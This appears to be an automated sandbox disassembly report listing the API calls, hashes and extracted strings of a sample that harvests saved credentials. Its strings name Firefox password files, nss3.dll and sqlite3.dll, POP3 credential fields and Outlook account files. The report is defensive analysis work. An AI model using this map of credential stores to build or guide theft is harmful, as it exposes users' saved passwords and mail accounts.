                                              • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                            • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Library$AddressFreeLoadProc
                                            • String ID:
                                            • API String ID: 145871493-0
                                            • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                            • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                            • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                            • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                            APIs
                                            • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                              • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                              • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                              • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: PrivateProfile$StringWrite_itoamemset
                                            • String ID:
                                            • API String ID: 4165544737-0
                                            • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                            • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                            • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                            • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                            APIs
                                            • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                            • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                            • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                            • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                            APIs
                                            • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                            • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                            • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                            • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                            APIs
                                            • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                            • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                            • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                            • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                            APIs
                                            • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: EnumNamesResource
                                            • String ID:
                                            • API String ID: 3334572018-0
                                            • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                            • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                            • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                            • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                            APIs
                                            • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: CloseFind
                                            • String ID:
                                            • API String ID: 1863332320-0
                                            • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                            • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                            • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                            • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                            • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                            • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                            • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                            APIs
                                            • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                            • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                            • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                            • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                            APIs
                                            • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                            • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                            • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                            • LoadCursorA.USER32(00000067), ref: 0040115F
                                            • SetCursor.USER32(00000000,?,?), ref: 00401166
                                            • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                            • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                            • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                            • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                            • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                            • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                            • EndDialog.USER32(?,00000001), ref: 0040121A
                                            • DeleteObject.GDI32(?), ref: 00401226
                                            • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                            • ShowWindow.USER32(00000000), ref: 00401253
                                            • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                            • ShowWindow.USER32(00000000), ref: 00401262
                                            • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                            • memset.MSVCRT ref: 0040128E
                                            • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                            • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                            • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                            • String ID:
                                            • API String ID: 2998058495-0
                                            • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                            • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                            • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                            • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _mbscat$memsetsprintf$_mbscpy
                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                            • API String ID: 633282248-1996832678
                                            • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                            • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                            • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                            • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: sprintf$memset$_mbscpy
                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                            • API String ID: 3402215030-3842416460
                                            • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                            • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                            • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                            • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                            APIs
                                              • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                              • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                              • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                              • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                              • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                              • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                            • strlen.MSVCRT ref: 0040F139
                                            • strlen.MSVCRT ref: 0040F147
                                            • memset.MSVCRT ref: 0040F187
                                            • strlen.MSVCRT ref: 0040F196
                                            • strlen.MSVCRT ref: 0040F1A4
                                            • memset.MSVCRT ref: 0040F1EA
                                            • strlen.MSVCRT ref: 0040F1F9
                                            • strlen.MSVCRT ref: 0040F207
                                            • _strcmpi.MSVCRT ref: 0040F2B2
                                            • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                            • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                            • String ID: logins.json$none$signons.sqlite$signons.txt
                                            • API String ID: 2003275452-3138536805
                                            • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                            • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                            • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                            • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                            APIs
                                            • memset.MSVCRT ref: 0040C3F7
                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                            • strrchr.MSVCRT ref: 0040C417
                                            • _mbscat.MSVCRT ref: 0040C431
                                            • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                            • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                            • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                            • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                            • API String ID: 1012775001-1343505058
                                            • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                            • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                            • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                            • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                            APIs
                                            • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                            • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressProc$Library$FreeLoad
                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                            • API String ID: 2449869053-232097475
                                            • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                            • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                            • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                            • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                            APIs
                                            • wcsstr.MSVCRT ref: 0040426A
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                            • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                            • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                            • strchr.MSVCRT ref: 004042F6
                                            • strlen.MSVCRT ref: 0040430A
                                            • sprintf.MSVCRT ref: 0040432B
                                            • strchr.MSVCRT ref: 0040433C
                                            Strings
                                            Similarity
                                            • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                            • String ID: %s@gmail.com$www.google.com
                                            • API String ID: 3866421160-4070641962
                                            APIs
                                            • strchr.MSVCRT ref: 004100E4
                                            • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                              • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                            • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                            • _mbscat.MSVCRT ref: 0041014D
                                            • memset.MSVCRT ref: 00410129
                                              • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                              • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                            • memset.MSVCRT ref: 00410171
                                            • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                            • _mbscat.MSVCRT ref: 00410197
                                            Strings
                                            Similarity
                                            • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                            • String ID: \systemroot
                                            • API String ID: 912701516-1821301763
                                            APIs
                                              • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                            • strchr.MSVCRT ref: 0040327B
                                            Strings
                                            Similarity
                                            • API ID: PrivateProfileStringstrchr
                                            • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                            • API String ID: 1348940319-1729847305
                                            APIs
                                            • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                            • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                            • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                            Strings
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                            • API String ID: 3510742995-3273207271
                                            APIs
                                            • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                            • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                            • GetDC.USER32(00000000), ref: 004072FB
                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                            • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                            • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                            • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                            • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                            Similarity
                                            • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                            • String ID:
                                            • API String ID: 1999381814-0
                                            APIs
                                            Strings
                                            Similarity
                                            • API ID: memcpymemset
                                            • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                            • API String ID: 1297977491-3883738016
                                            APIs
                                            Strings
                                            Similarity
                                            • API ID: __aulldvrm$__aullrem
                                            • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                            • API String ID: 643879872-978417875
                                            APIs
                                            • memset.MSVCRT ref: 0040810E
                                              • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                            • LocalFree.KERNEL32(?,?,?,?,?,00000000,75A8EB20,?), ref: 004081B9
                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                            Strings
                                            Similarity
                                            • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                            • String ID: POP3_credentials$POP3_host$POP3_name
                                            • API String ID: 524865279-2190619648
                                            APIs
                                              • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                            • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                            • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                              • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                              • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                              • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                              • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                              • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                              • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                              • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                            • CloseHandle.KERNEL32(?), ref: 00444206
                                            Strings
                                            Similarity
